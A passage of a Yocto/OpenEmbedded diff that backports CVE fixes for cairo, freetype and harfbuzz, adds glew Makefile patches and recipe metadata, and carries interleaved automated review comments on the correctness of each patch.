+CVE_CHECK_WHITELIST += "CVE-2013-7381"
diff --git a/meta/recipes-gnome/librsvg/librsvg_2.40.21.bb b/meta/recipes-gnome/librsvg/librsvg_2.40.21.bb
index 237aec6062..ef1dae0a69 100644
--- a/meta/recipes-gnome/librsvg/librsvg_2.40.21.bb
+++ b/meta/recipes-gnome/librsvg/librsvg_2.40.21.bb
@@ -25,6 +25,9 @@ SRC_URI += "file://gtk-option.patch \
SRC_URI[archive.sha256sum] = "f7628905f1cada84e87e2b14883ed57d8094dca3281d5bcb24ece4279e9a92ba"
+# Issue only on windows
+CVE_CHECK_WHITELIST += "CVE-2018-1000041"
+
CACHED_CONFIGUREVARS = "ac_cv_path_GDK_PIXBUF_QUERYLOADERS=${STAGING_LIBDIR_NATIVE}/gdk-pixbuf-2.0/gdk-pixbuf-query-loaders"
PACKAGECONFIG ??= "gdkpixbuf"
diff --git a/meta/recipes-gnome/libsecret/libsecret_0.20.1.bb b/meta/recipes-gnome/libsecret/libsecret_0.20.1.bb
index 72511af02d..8b5d301515 100644
--- a/meta/recipes-gnome/libsecret/libsecret_0.20.1.bb
+++ b/meta/recipes-gnome/libsecret/libsecret_0.20.1.bb
@@ -4,6 +4,7 @@ the freedesktop.org project, a cross-desktop effort to access passwords, \
tokens and other types of secrets. libsecret provides a convenient wrapper \
for these methods so consumers do not have to call the low-level DBus methods."
LICENSE = "LGPLv2.1"
+HOMEPAGE = "https://github.com/GNOME/libsecret"
BUGTRACKER = "https://gitlab.gnome.org/GNOME/libsecret/issues"
LIC_FILES_CHKSUM = "file://COPYING;md5=23c2a5e0106b99d75238986559bb5fc6"
diff --git a/meta/recipes-graphics/builder/builder_0.1.bb b/meta/recipes-graphics/builder/builder_0.1.bb
index 0a64c31ab3..9d5cd8cde6 100644
--- a/meta/recipes-graphics/builder/builder_0.1.bb
+++ b/meta/recipes-graphics/builder/builder_0.1.bb
@@ -29,3 +29,5 @@ do_install () {
chown builder.builder ${D}${sysconfdir}/mini_x/session.d/builder_session.sh
}
+# -4178 is an unrelated 'builder'
+CVE_CHECK_WHITELIST = "CVE-2008-4178"
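Review bot: The added `CVE_CHECK_WHITELIST = "CVE-2008-4178"` is a plain assignment, so it replaces whatever the variable already holds when this recipe is parsed. Any entries whitelisted from configuration or an include would be dropped for `builder`. The libnotify and librsvg hunks in this same diff append instead; `CVE_CHECK_WHITELIST += "CVE-2008-4178"` would keep earlier entries and match them.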
diff --git a/meta/recipes-graphics/cairo/cairo/CVE-2019-6461.patch b/meta/recipes-graphics/cairo/cairo/CVE-2019-6461.patch
index 5232cf70c6..a2dba6cb20 100644
--- a/meta/recipes-graphics/cairo/cairo/CVE-2019-6461.patch
+++ b/meta/recipes-graphics/cairo/cairo/CVE-2019-6461.patch
@@ -1,19 +1,20 @@
-There is a potential infinite-loop in function _arc_error_normalized().
+There is an assertion in function _cairo_arc_in_direction().
CVE: CVE-2019-6461
Upstream-Status: Pending
Signed-off-by: Ross Burton <ross.burton@intel.com>
diff --git a/src/cairo-arc.c b/src/cairo-arc.c
-index 390397bae..f9249dbeb 100644
+index 390397bae..1bde774a4 100644
--- a/src/cairo-arc.c
+++ b/src/cairo-arc.c
-@@ -99,7 +99,7 @@ _arc_max_angle_for_tolerance_normalized (double tolerance)
- do {
- angle = M_PI / i++;
- error = _arc_error_normalized (angle);
-- } while (error > tolerance);
-+ } while (error > tolerance && error > __DBL_EPSILON__);
+@@ -186,7 +186,8 @@ _cairo_arc_in_direction (cairo_t *cr,
+ if (cairo_status (cr))
+ return;
- return angle;
- }
+- assert (angle_max >= angle_min);
++ if (angle_max < angle_min)
++ return;
+
+ if (angle_max - angle_min > 2 * M_PI * MAX_FULL_CIRCLES) {
+ angle_max = fmod (angle_max - angle_min, 2 * M_PI);
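Review bot: The replacement guard `if (angle_max < angle_min) return;` is not the exact complement of the removed `assert (angle_max >= angle_min)`. When either angle is NaN both comparisons are false, so a value the assert rejected now passes the guard and reaches the `fmod` arithmetic below it. Writing the guard as `if (!(angle_max >= angle_min)) return;` keeps the original condition. Whether a NaN can actually reach `_cairo_arc_in_direction` depends on callers outside this hunk, and the function body continues past it.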
diff --git a/meta/recipes-graphics/cairo/cairo/CVE-2019-6462.patch b/meta/recipes-graphics/cairo/cairo/CVE-2019-6462.patch
index 4e4598c5b5..7c3209291b 100644
--- a/meta/recipes-graphics/cairo/cairo/CVE-2019-6462.patch
+++ b/meta/recipes-graphics/cairo/cairo/CVE-2019-6462.patch
@@ -1,20 +1,40 @@
-There is an assertion in function _cairo_arc_in_direction().
-
CVE: CVE-2019-6462
-Upstream-Status: Pending
-Signed-off-by: Ross Burton <ross.burton@intel.com>
+Upstream-Status: Backport
+Signed-off-by: Quentin Schulz <quentin.schulz@theobroma-systems.com>
+
+From ab2c5ee21e5f3d3ee4b3f67cfcd5811a4f99c3a0 Mon Sep 17 00:00:00 2001
+From: Heiko Lewin <hlewin@gmx.de>
+Date: Sun, 1 Aug 2021 11:16:03 +0000
+Subject: [PATCH] _arc_max_angle_for_tolerance_normalized: fix infinite loop
+
+---
+ src/cairo-arc.c | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
diff --git a/src/cairo-arc.c b/src/cairo-arc.c
-index 390397bae..1bde774a4 100644
+index 390397bae..1c891d1a0 100644
--- a/src/cairo-arc.c
+++ b/src/cairo-arc.c
-@@ -186,7 +186,8 @@ _cairo_arc_in_direction (cairo_t *cr,
- if (cairo_status (cr))
- return;
+@@ -90,16 +90,18 @@ _arc_max_angle_for_tolerance_normalized (double tolerance)
+ { M_PI / 11.0, 9.81410988043554039085e-09 },
+ };
+ int table_size = ARRAY_LENGTH (table);
++ const int max_segments = 1000; /* this value is chosen arbitrarily. this gives an error of about 1.74909e-20 */
-- assert (angle_max >= angle_min);
-+ if (angle_max < angle_min)
-+ return;
+ for (i = 0; i < table_size; i++)
+ if (table[i].error < tolerance)
+ return table[i].angle;
- if (angle_max - angle_min > 2 * M_PI * MAX_FULL_CIRCLES) {
- angle_max = fmod (angle_max - angle_min, 2 * M_PI);
+ ++i;
++
+ do {
+ angle = M_PI / i++;
+ error = _arc_error_normalized (angle);
+- } while (error > tolerance);
++ } while (error > tolerance && i < max_segments);
+
+ return angle;
+ }
+--
+2.38.1
+
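Review bot: With the added `i < max_segments` bound, the loop in `_arc_max_angle_for_tolerance_normalized` can exit while `error > tolerance` still holds, and the function then returns that angle as if it met the request. A comment at the return, for example `/* error may still exceed tolerance if max_segments was reached */`, would make that contract visible to callers. The header also gives `Upstream-Status: Backport` with no upstream reference in brackets, unlike the freetype backports in this diff; the commit id appears only in the `From` line. The function starts outside the hunk.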
diff --git a/meta/recipes-graphics/cairo/cairo/CVE-2020-35492.patch b/meta/recipes-graphics/cairo/cairo/CVE-2020-35492.patch
new file mode 100644
index 0000000000..fb6ce5cfdf
--- /dev/null
+++ b/meta/recipes-graphics/cairo/cairo/CVE-2020-35492.patch
@@ -0,0 +1,60 @@
+Fix stack buffer overflow.
+
+CVE: CVE-2020-35492
+Upstream-Status: Backport
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+From 03a820b173ed1fdef6ff14b4468f5dbc02ff59be Mon Sep 17 00:00:00 2001
+From: Heiko Lewin <heiko.lewin@worldiety.de>
+Date: Tue, 15 Dec 2020 16:48:19 +0100
+Subject: [PATCH] Fix mask usage in image-compositor
+
+---
+ src/cairo-image-compositor.c | 8 ++--
+ test/Makefile.sources | 1 +
+ test/bug-image-compositor.c | 39 ++++++++++++++++++++
+ test/reference/bug-image-compositor.ref.png | Bin 0 -> 185 bytes
+ 4 files changed, 44 insertions(+), 4 deletions(-)
+ create mode 100644 test/bug-image-compositor.c
+ create mode 100644 test/reference/bug-image-compositor.ref.png
+
+diff --git a/src/cairo-image-compositor.c b/src/cairo-image-compositor.c
+index 79ad69f68..4f8aaed99 100644
+--- a/src/cairo-image-compositor.c
++++ b/src/cairo-image-compositor.c
+@@ -2601,14 +2601,14 @@ _inplace_src_spans (void *abstract_renderer, int y, int h,
+ unsigned num_spans)
+ {
+ cairo_image_span_renderer_t *r = abstract_renderer;
+- uint8_t *m;
++ uint8_t *m, *base = (uint8_t*)pixman_image_get_data(r->mask);
+ int x0;
+
+ if (num_spans == 0)
+ return CAIRO_STATUS_SUCCESS;
+
+ x0 = spans[0].x;
+- m = r->_buf;
++ m = base;
+ do {
+ int len = spans[1].x - spans[0].x;
+ if (len >= r->u.composite.run_length && spans[0].coverage == 0xff) {
+@@ -2655,7 +2655,7 @@ _inplace_src_spans (void *abstract_renderer, int y, int h,
+ spans[0].x, y,
+ spans[1].x - spans[0].x, h);
+
+- m = r->_buf;
++ m = base;
+ x0 = spans[1].x;
+ } else if (spans[0].coverage == 0x0) {
+ if (spans[0].x != x0) {
+@@ -2684,7 +2684,7 @@ _inplace_src_spans (void *abstract_renderer, int y, int h,
+ #endif
+ }
+
+- m = r->_buf;
++ m = base;
+ x0 = spans[1].x;
+ } else {
+ *m++ = spans[0].coverage;
+--
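Review bot: The embedded diffstat lists four files, including `test/bug-image-compositor.c` and its reference image, but only the `src/cairo-image-compositor.c` hunks are carried. The upstream regression test for this overflow is therefore not applied here, and the header does not say so. A line such as `Comment: test/ hunks dropped, only src/cairo-image-compositor.c is applied` under `Upstream-Status` would record it, as the CVE-2022-27404 patch in this diff does for its removed hunk. Separately, `base` comes from `pixman_image_get_data(r->mask)` and is written through without a check; that is fine only if `r->mask` is always a bits image here, which is set up outside the hunk and worth confirming.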
diff --git a/meta/recipes-graphics/cairo/cairo_1.16.0.bb b/meta/recipes-graphics/cairo/cairo_1.16.0.bb
index 8663dec404..4827374ffc 100644
--- a/meta/recipes-graphics/cairo/cairo_1.16.0.bb
+++ b/meta/recipes-graphics/cairo/cairo_1.16.0.bb
@@ -27,6 +27,7 @@ SRC_URI = "http://cairographics.org/releases/cairo-${PV}.tar.xz \
file://CVE-2018-19876.patch \
file://CVE-2019-6461.patch \
file://CVE-2019-6462.patch \
+ file://CVE-2020-35492.patch \
"
SRC_URI[md5sum] = "f19e0353828269c22bd72e271243a552"
diff --git a/meta/recipes-graphics/clutter/clutter-gst-3.0.inc b/meta/recipes-graphics/clutter/clutter-gst-3.0.inc
index 7d9db1f38c..73315c97ec 100644
--- a/meta/recipes-graphics/clutter/clutter-gst-3.0.inc
+++ b/meta/recipes-graphics/clutter/clutter-gst-3.0.inc
@@ -1,5 +1,9 @@
SUMMARY = "GStreamer integration library for Clutter"
+DESCRIPTION = "Clutter-Gst is an integration library for using GStreamer with Clutter. \
+It provides a GStreamer sink to upload frames to GL and an actor that \
+implements the ClutterGstPlayer interface using playbin."
HOMEPAGE = "http://www.clutter-project.org/"
+BUGTRACKER = "https://gitlab.gnome.org/GNOME/clutter-gst/-/issues"
LICENSE = "LGPLv2+"
inherit clutter features_check upstream-version-is-even gobject-introspection
diff --git a/meta/recipes-graphics/clutter/clutter-gtk-1.0.inc b/meta/recipes-graphics/clutter/clutter-gtk-1.0.inc
index 7bf2278555..9a28b5219b 100644
--- a/meta/recipes-graphics/clutter/clutter-gtk-1.0.inc
+++ b/meta/recipes-graphics/clutter/clutter-gtk-1.0.inc
@@ -1,5 +1,10 @@
SUMMARY = "Library for embedding a Clutter canvas in a GTK+ application"
+DESCRIPTION = "Clutter-GTK is a library providing facilities to integrate Clutter into GTK+ \
+applications and vice versa. It provides a GTK+ widget, GtkClutterEmbed, for embedding the \
+a Clutter stage into any GtkContainer; and GtkClutterActor, a Clutter \
+actor for embedding any GtkWidget inside a Clutter stage."
HOMEPAGE = "http://www.clutter-project.org/"
+BUGTRACKER = "https://gitlab.gnome.org/GNOME/clutter/-/issues"
LICENSE = "LGPLv2+"
CLUTTERBASEBUILDCLASS = "meson"
diff --git a/meta/recipes-graphics/freetype/freetype/0001-sfnt-Fix-heap-buffer-overflow-59308.patch b/meta/recipes-graphics/freetype/freetype/0001-sfnt-Fix-heap-buffer-overflow-59308.patch
index fa8a29b798..31f9e32dc2 100644
--- a/meta/recipes-graphics/freetype/freetype/0001-sfnt-Fix-heap-buffer-overflow-59308.patch
+++ b/meta/recipes-graphics/freetype/freetype/0001-sfnt-Fix-heap-buffer-overflow-59308.patch
@@ -6,10 +6,13 @@ Subject: [PATCH] [sfnt] Fix heap buffer overflow (#59308).
This is CVE-2020-15999.
* src/sfnt/pngshim.c (Load_SBit_Png): Test bitmap size earlier.
+CVE: CVE-2020-15999
Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/freetype/freetype2.git/commit/?id=a3bab162b2ae616074c8877a04556932998aeacd]
Signed-off-by: Diego Santa Cruz <Diego.SantaCruz@spinetix.com>
+Signed-off-by: Purushottam Choudhary <purushottam.choudhary@kpit.com>
+Signed-off-by: Purushottam Choudhary <purushottamchoudhary29@gmail.com>
---
src/sfnt/pngshim.c | 14 +++++++-------
1 file changed, 7 insertions(+), 7 deletions(-)
diff --git a/meta/recipes-graphics/freetype/freetype/CVE-2022-27404.patch b/meta/recipes-graphics/freetype/freetype/CVE-2022-27404.patch
new file mode 100644
index 0000000000..e66400ddb1
--- /dev/null
+++ b/meta/recipes-graphics/freetype/freetype/CVE-2022-27404.patch
@@ -0,0 +1,33 @@
+From 53dfdcd8198d2b3201a23c4bad9190519ba918db Mon Sep 17 00:00:00 2001
+From: Werner Lemberg <wl@gnu.org>
+Date: Thu, 17 Mar 2022 19:24:16 +0100
+Subject: [PATCH] [sfnt] Avoid invalid face index.
+
+Fixes #1138.
+
+* src/sfnt/sfobjs.c (sfnt_init_face), src/sfnt/sfwoff2.c (woff2_open_font):
+Check `face_index` before decrementing.
+
+CVE: CVE-2022-27404
+Upstream-Status: Backport [https://gitlab.freedesktop.org/freetype/freetype/-/commit/53dfdcd8198d2b3201a23c4bad9190519ba918db.patch]
+Comment: Removed second hunk as sfwoff2.c file is not part of current v2.10.1 code
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+---
+ src/sfnt/sfobjs.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/src/sfnt/sfobjs.c b/src/sfnt/sfobjs.c
+index f9d4d3858..9771c35df 100644
+--- a/src/sfnt/sfobjs.c
++++ b/src/sfnt/sfobjs.c
+@@ -566,7 +566,7 @@
+ face_index = FT_ABS( face_instance_index ) & 0xFFFF;
+
+ /* value -(N+1) requests information on index N */
+- if ( face_instance_index < 0 )
++ if ( face_instance_index < 0 && face_index > 0 )
+ face_index--;
+
+ if ( face_index >= face->ttc_header.count )
+--
+GitLab
diff --git a/meta/recipes-graphics/freetype/freetype/CVE-2022-27405.patch b/meta/recipes-graphics/freetype/freetype/CVE-2022-27405.patch
new file mode 100644
index 0000000000..08fccd5a3b
--- /dev/null
+++ b/meta/recipes-graphics/freetype/freetype/CVE-2022-27405.patch
@@ -0,0 +1,38 @@
+From 22a0cccb4d9d002f33c1ba7a4b36812c7d4f46b5 Mon Sep 17 00:00:00 2001
+From: Werner Lemberg <wl@gnu.org>
+Date: Sat, 19 Mar 2022 06:40:17 +0100
+Subject: [PATCH] * src/base/ftobjs.c (ft_open_face_internal): Properly guard
+ `face_index`.
+We must ensure that the cast to `FT_Int` doesn't change the sign.
+Fixes #1139.
+
+CVE: CVE-2022-27405
+Upstream-Status: Backport [https://gitlab.freedesktop.org/freetype/freetype/-/commit/22a0cccb4d9d002f33c1ba7a4b36812c7d4f46b5]
+Comment: No Change in any hunk
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+---
+ src/base/ftobjs.c | 9 +++++++++
+ 1 file changed, 9 insertions(+)
+
+diff --git a/src/base/ftobjs.c b/src/base/ftobjs.c
+index 2c0f0e6c9..10952a6c6 100644
+--- a/src/base/ftobjs.c
++++ b/src/base/ftobjs.c
+@@ -2527,6 +2527,15 @@
+ #endif
+
+
++ /* only use lower 31 bits together with sign bit */
++ if ( face_index > 0 )
++ face_index &= 0x7FFFFFFFL;
++ else
++ {
++ face_index &= 0x7FFFFFFFL;
++ face_index = -face_index;
++ }
++
+ #ifdef FT_DEBUG_LEVEL_TRACE
+ FT_TRACE3(( "FT_Open_Face: " ));
+ if ( face_index < 0 )
+--
+GitLab
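Review bot: In the `else` branch, `face_index &= 0x7FFFFFFFL;` is applied while `face_index` is still negative, so the mask acts on the two's-complement bit pattern rather than on the magnitude. A value of -1 becomes 0x7FFFFFFF and is then negated to -2147483647: the sign survives but the value does not, which matters if later code (outside the hunk) reads the magnitude of a negative index. Negating before the mask as well, `face_index = -face_index;` ahead of the `&=` line, would keep the low 31 bits of the magnitude, with the most negative value needing separate care. It is worth checking whether upstream has a follow-up to this commit that should be backported alongside it. `ft_open_face_internal` starts and ends outside the hunk.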
diff --git a/meta/recipes-graphics/freetype/freetype/CVE-2022-27406.patch b/meta/recipes-graphics/freetype/freetype/CVE-2022-27406.patch
new file mode 100644
index 0000000000..4b5e629f30
--- /dev/null
+++ b/meta/recipes-graphics/freetype/freetype/CVE-2022-27406.patch
@@ -0,0 +1,31 @@
+From 0c2bdb01a2e1d24a3e592377a6d0822856e10df2 Mon Sep 17 00:00:00 2001
+From: Werner Lemberg <wl@gnu.org>
+Date: Sat, 19 Mar 2022 09:37:28 +0100
+Subject: [PATCH] * src/base/ftobjs.c (FT_Request_Size): Guard `face->size`.
+
+Fixes #1140.
+
+CVE: CVE-2022-27406
+Upstream-Status: Backport [https://gitlab.freedesktop.org/freetype/freetype/-/commit/0c2bdb01a2e1d24a3e592377a6d0822856e10df2]
+Comment: No Change in any hunk
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+---
+ src/base/ftobjs.c | 3 +++
+ 1 file changed, 3 insertions(+)
+
+diff --git a/src/base/ftobjs.c b/src/base/ftobjs.c
+index 6492a1517..282c9121a 100644
+--- a/src/base/ftobjs.c
++++ b/src/base/ftobjs.c
+@@ -3409,6 +3409,9 @@
+ if ( !face )
+ return FT_THROW( Invalid_Face_Handle );
+
++ if ( !face->size )
++ return FT_THROW( Invalid_Size_Handle );
++
+ if ( !req || req->width < 0 || req->height < 0 ||
+ req->type >= FT_SIZE_REQUEST_TYPE_MAX )
+ return FT_THROW( Invalid_Argument );
+--
+GitLab
diff --git a/meta/recipes-graphics/freetype/freetype/CVE-2023-2004.patch b/meta/recipes-graphics/freetype/freetype/CVE-2023-2004.patch
new file mode 100644
index 0000000000..800d77579e
--- /dev/null
+++ b/meta/recipes-graphics/freetype/freetype/CVE-2023-2004.patch
@@ -0,0 +1,40 @@
+From e6fda039ad638866b7a6a5d046f03278ba1b7611 Mon Sep 17 00:00:00 2001
+From: Werner Lemberg <wl@gnu.org>
+Date: Mon, 14 Nov 2022 19:18:19 +0100
+Subject: [PATCH] * src/truetype/ttgxvar.c (tt_hvadvance_adjust): Integer
+ overflow.
+
+Reported as
+
+ https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50462
+
+Upstream-Status: Backport [https://github.com/freetype/freetype/commit/e6fda039ad638866b7a6a5d046f03278ba1b7611]
+CVE: CVE-2023-2004
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ src/truetype/ttgxvar.c | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/src/truetype/ttgxvar.c b/src/truetype/ttgxvar.c
+index 78d87dc..258d701 100644
+--- a/src/truetype/ttgxvar.c
++++ b/src/truetype/ttgxvar.c
+@@ -43,6 +43,7 @@
+ #include FT_INTERNAL_DEBUG_H
+ #include FT_CONFIG_CONFIG_H
+ #include FT_INTERNAL_STREAM_H
++#include <freetype/internal/ftcalc.h>
+ #include FT_INTERNAL_SFNT_H
+ #include FT_TRUETYPE_TAGS_H
+ #include FT_TRUETYPE_IDS_H
+@@ -1065,7 +1066,7 @@
+ delta == 1 ? "" : "s",
+ vertical ? "VVAR" : "HVAR" ));
+
+- *avalue += delta;
++ *avalue = ADD_INT( *avalue, delta );
+
+ Exit:
+ return error;
+--
+2.17.1
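Review bot: The added `#include <freetype/internal/ftcalc.h>` names the header directly, while every neighbouring include in that hunk goes through an `FT_..._H` macro. `#include FT_INTERNAL_CALC_H` would match the file's convention for this FreeType version. The upstream subject mentions only `tt_hvadvance_adjust`, so the include hunk looks like a local addition for 2.10.1; a `Comment:` line in the header saying so would match the other freetype backports in this diff.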
diff --git a/meta/recipes-graphics/freetype/freetype_2.10.1.bb b/meta/recipes-graphics/freetype/freetype_2.10.1.bb
index 2d444bbf19..6af744b981 100644
--- a/meta/recipes-graphics/freetype/freetype_2.10.1.bb
+++ b/meta/recipes-graphics/freetype/freetype_2.10.1.bb
@@ -15,6 +15,10 @@ LIC_FILES_CHKSUM = "file://docs/LICENSE.TXT;md5=4af6221506f202774ef74f64932878a1
SRC_URI = "${SAVANNAH_NONGNU_MIRROR}/${BPN}/${BP}.tar.xz \
file://use-right-libtool.patch \
file://0001-sfnt-Fix-heap-buffer-overflow-59308.patch \
+ file://CVE-2022-27404.patch \
+ file://CVE-2022-27405.patch \
+ file://CVE-2022-27406.patch \
+ file://CVE-2023-2004.patch \
"
SRC_URI[md5sum] = "bd42e75127f8431923679480efb5ba8f"
SRC_URI[sha256sum] = "16dbfa488a21fe827dc27eaf708f42f7aa3bb997d745d31a19781628c36ba26f"
diff --git a/meta/recipes-graphics/glew/glew/0001-Fix-build-race-in-Makefile.patch b/meta/recipes-graphics/glew/glew/0001-Fix-build-race-in-Makefile.patch
new file mode 100644
index 0000000000..7edcfe8de8
--- /dev/null
+++ b/meta/recipes-graphics/glew/glew/0001-Fix-build-race-in-Makefile.patch
@@ -0,0 +1,56 @@
+Upstream-Status: Submitted [https://github.com/nigels-com/glew/pull/311]
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+From 0ce0a85597db48a2fca619bd95e34af091e54ae8 Mon Sep 17 00:00:00 2001
+From: Ross Burton <ross.burton@arm.com>
+Date: Thu, 22 Jul 2021 16:31:11 +0100
+Subject: [PATCH] Fix build race in Makefile
+
+The current rule for the binaries is:
+
+glew.bin: glew.lib bin bin/$(GLEWINFO.BIN) bin/$(VISUALINFO.BIN)
+
+In parallel builds, all of those targets happen at the same time. This
+means that 'bin' can happen *after* 'bin/$(GLEWINFO.BIN)', which is a
+problem as the 'bin' target's responsibility is to create the directory
+that the other target writes into.
+
+Solve this by not having a separate 'create directory' target which is
+fundamentally racy, and simply mkdir in each target which writes into it.
+---
+ Makefile | 9 ++++-----
+ 1 file changed, 4 insertions(+), 5 deletions(-)
+
+diff --git a/Makefile b/Makefile
+index d0e4614..04af44c 100644
+--- a/Makefile
++++ b/Makefile
+@@ -171,21 +171,20 @@ VISUALINFO.BIN.OBJ := $(VISUALINFO.BIN.OBJ:.c=.o)
+ # Don't build glewinfo or visualinfo for NaCL, yet.
+
+ ifneq ($(filter nacl%,$(SYSTEM)),)
+-glew.bin: glew.lib bin
++glew.bin: glew.lib
+ else
+-glew.bin: glew.lib bin bin/$(GLEWINFO.BIN) bin/$(VISUALINFO.BIN)
++glew.bin: glew.lib bin/$(GLEWINFO.BIN) bin/$(VISUALINFO.BIN)
+ endif
+
+-bin:
+- mkdir bin
+-
+ bin/$(GLEWINFO.BIN): $(GLEWINFO.BIN.OBJ) $(LIB.SHARED.DIR)/$(LIB.SHARED)
++ @mkdir -p $(dir $@)
+ $(CC) $(CFLAGS) -o $@ $(GLEWINFO.BIN.OBJ) $(BIN.LIBS)
+ ifneq ($(STRIP),)
+ $(STRIP) -x $@
+ endif
+
+ bin/$(VISUALINFO.BIN): $(VISUALINFO.BIN.OBJ) $(LIB.SHARED.DIR)/$(LIB.SHARED)
++ @mkdir -p $(dir $@)
+ $(CC) $(CFLAGS) -o $@ $(VISUALINFO.BIN.OBJ) $(BIN.LIBS)
+ ifneq ($(STRIP),)
+ $(STRIP) -x $@
+--
+2.25.1
+
diff --git a/meta/recipes-graphics/glew/glew/notempdir.patch b/meta/recipes-graphics/glew/glew/notempdir.patch
new file mode 100644
index 0000000000..8d79ce0cdf
--- /dev/null
+++ b/meta/recipes-graphics/glew/glew/notempdir.patch
@@ -0,0 +1,19 @@
+We don't use the dist-* targets and hence DIST_DIR isn't used. The current code
+creates a new temp directory in /tmp/ for every invocation of make. Lets
+not do that.
+
+Upstream-Status: Pending [a revised version would be needed for upstream]
+Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
+
+Index: glew-2.2.0/Makefile
+===================================================================
+--- glew-2.2.0.orig/Makefile
++++ glew-2.2.0/Makefile
+@@ -56,7 +56,6 @@ DIST_SRC_ZIP ?= $(shell pwd)/$(DIST_NAME
+ DIST_SRC_TGZ ?= $(shell pwd)/$(DIST_NAME).tgz
+ DIST_WIN32 ?= $(shell pwd)/$(DIST_NAME)-win32.zip
+
+-DIST_DIR := $(shell mktemp -d /tmp/glew.XXXXXX)/$(DIST_NAME)
+
+ # To disable stripping of linked binaries either:
+ # - use STRIP= on gmake command-line
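Review bot: Removing the `DIST_DIR :=` assignment leaves the variable undefined while the `dist-*` rules mentioned in the description stay in the Makefile. Anyone who does run them would have `$(DIST_DIR)` expand to an empty string in whatever paths those rules build; the rules themselves are outside the hunk. A recursively expanded stub such as `DIST_DIR = $(error DIST_DIR is disabled in this build)` would still avoid the per-invocation `mktemp` and fail loudly instead, provided nothing expands it at parse time.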
diff --git a/meta/recipes-graphics/glew/glew_2.2.0.bb b/meta/recipes-graphics/glew/glew_2.2.0.bb
index 8948444e08..d7a26a3438 100644
--- a/meta/recipes-graphics/glew/glew_2.2.0.bb
+++ b/meta/recipes-graphics/glew/glew_2.2.0.bb
@@ -6,6 +6,8 @@ LICENSE = "MIT"
LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=2ac251558de685c6b9478d89be3149c2"
SRC_URI = "${SOURCEFORGE_MIRROR}/project/glew/glew/${PV}/glew-${PV}.tgz \
+ file://0001-Fix-build-race-in-Makefile.patch \
+ file://notempdir.patch \
file://no-strip.patch"
SRC_URI[md5sum] = "3579164bccaef09e36c0af7f4fd5c7c7"
diff --git a/meta/recipes-graphics/harfbuzz/harfbuzz/CVE-2023-25193-pre0.patch b/meta/recipes-graphics/harfbuzz/harfbuzz/CVE-2023-25193-pre0.patch
new file mode 100644
index 0000000000..90d4cfefb4
--- /dev/null
+++ b/meta/recipes-graphics/harfbuzz/harfbuzz/CVE-2023-25193-pre0.patch
@@ -0,0 +1,335 @@
+From 3122c2cdc45a964efedad8953a2df67205c3e3a8 Mon Sep 17 00:00:00 2001
+From: Behdad Esfahbod <behdad@behdad.org>
+Date: Sat, 4 Dec 2021 19:50:33 -0800
+Subject: [PATCH] [buffer] Add HB_GLYPH_FLAG_UNSAFE_TO_CONCAT
+
+Fixes https://github.com/harfbuzz/harfbuzz/issues/1463
+Upstream-Status: Backport from [https://github.com/harfbuzz/harfbuzz/commit/3122c2cdc45a964efedad8953a2df67205c3e3a8]
+Comment1: To backport the fix for CVE-2023-25193, add defination for HB_GLYPH_FLAG_UNSAFE_TO_CONCAT. This patch is needed along with CVE-2023-25193-pre1.patch for sucessfull porting.
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ src/hb-buffer.cc | 10 ++---
+ src/hb-buffer.h | 76 ++++++++++++++++++++++++++++++------
+ src/hb-buffer.hh | 33 ++++++++++------
+ src/hb-ot-layout-gsubgpos.hh | 39 +++++++++++++++---
+ src/hb-ot-shape.cc | 8 +---
+ 5 files changed, 124 insertions(+), 42 deletions(-)
+
+diff --git a/src/hb-buffer.cc b/src/hb-buffer.cc
+index 6131c86..bba5eae 100644
+--- a/src/hb-buffer.cc
++++ b/src/hb-buffer.cc
+@@ -610,14 +610,14 @@ done:
+ }
+
+ void
+-hb_buffer_t::unsafe_to_break_impl (unsigned int start, unsigned int end)
++hb_buffer_t::unsafe_to_break_impl (unsigned int start, unsigned int end, hb_mask_t mask)
+ {
+ unsigned int cluster = (unsigned int) -1;
+ cluster = _unsafe_to_break_find_min_cluster (info, start, end, cluster);
+- _unsafe_to_break_set_mask (info, start, end, cluster);
++ _unsafe_to_break_set_mask (info, start, end, cluster, mask);
+ }
+ void
+-hb_buffer_t::unsafe_to_break_from_outbuffer (unsigned int start, unsigned int end)
++hb_buffer_t::unsafe_to_break_from_outbuffer (unsigned int start, unsigned int end, hb_mask_t mask)
+ {
+ if (!have_output)
+ {
+@@ -631,8 +631,8 @@ hb_buffer_t::unsafe_to_break_from_outbuffer (unsigned int start, unsigned int en
+ unsigned int cluster = (unsigned int) -1;
+ cluster = _unsafe_to_break_find_min_cluster (out_info, start, out_len, cluster);
+ cluster = _unsafe_to_break_find_min_cluster (info, idx, end, cluster);
+- _unsafe_to_break_set_mask (out_info, start, out_len, cluster);
+- _unsafe_to_break_set_mask (info, idx, end, cluster);
++ _unsafe_to_break_set_mask (out_info, start, out_len, cluster, mask);
++ _unsafe_to_break_set_mask (info, idx, end, cluster, mask);
+ }
+
+ void
+diff --git a/src/hb-buffer.h b/src/hb-buffer.h
+index d5cb746..42dc92a 100644
+--- a/src/hb-buffer.h
++++ b/src/hb-buffer.h
+@@ -77,26 +77,76 @@ typedef struct hb_glyph_info_t
+ * @HB_GLYPH_FLAG_UNSAFE_TO_BREAK: Indicates that if input text is broken at the
+ * beginning of the cluster this glyph is part of,
+ * then both sides need to be re-shaped, as the
+- * result might be different. On the flip side,
+- * it means that when this flag is not present,
+- * then it's safe to break the glyph-run at the
+- * beginning of this cluster, and the two sides
+- * represent the exact same result one would get
+- * if breaking input text at the beginning of
+- * this cluster and shaping the two sides
+- * separately. This can be used to optimize
+- * paragraph layout, by avoiding re-shaping
+- * of each line after line-breaking, or limiting
+- * the reshaping to a small piece around the
+- * breaking point only.
++ * result might be different.
++ *
++ * On the flip side, it means that when this
